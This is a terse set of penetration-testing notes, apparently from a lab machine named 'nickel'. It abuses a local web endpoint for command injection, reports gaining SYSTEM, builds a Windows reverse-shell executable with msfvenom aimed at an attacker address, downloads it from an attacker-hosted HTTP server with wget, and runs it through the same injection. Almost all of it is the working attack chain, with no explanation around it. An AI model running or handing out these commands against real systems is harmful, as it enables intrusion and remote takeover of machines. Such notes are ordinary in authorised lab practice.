curl http://localhost:80/?whoami
We have system.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.236 LPORT=3001 -f exe -o shell.exe
wget http://192.168.45.236:8000/shell.exe -o shell.exe
curl http://localhost:80/?C:/temp/shell.exe
$Resp = iwr 'http://nickel/?whoami' -UseBasicParsing
$Resp.RawContent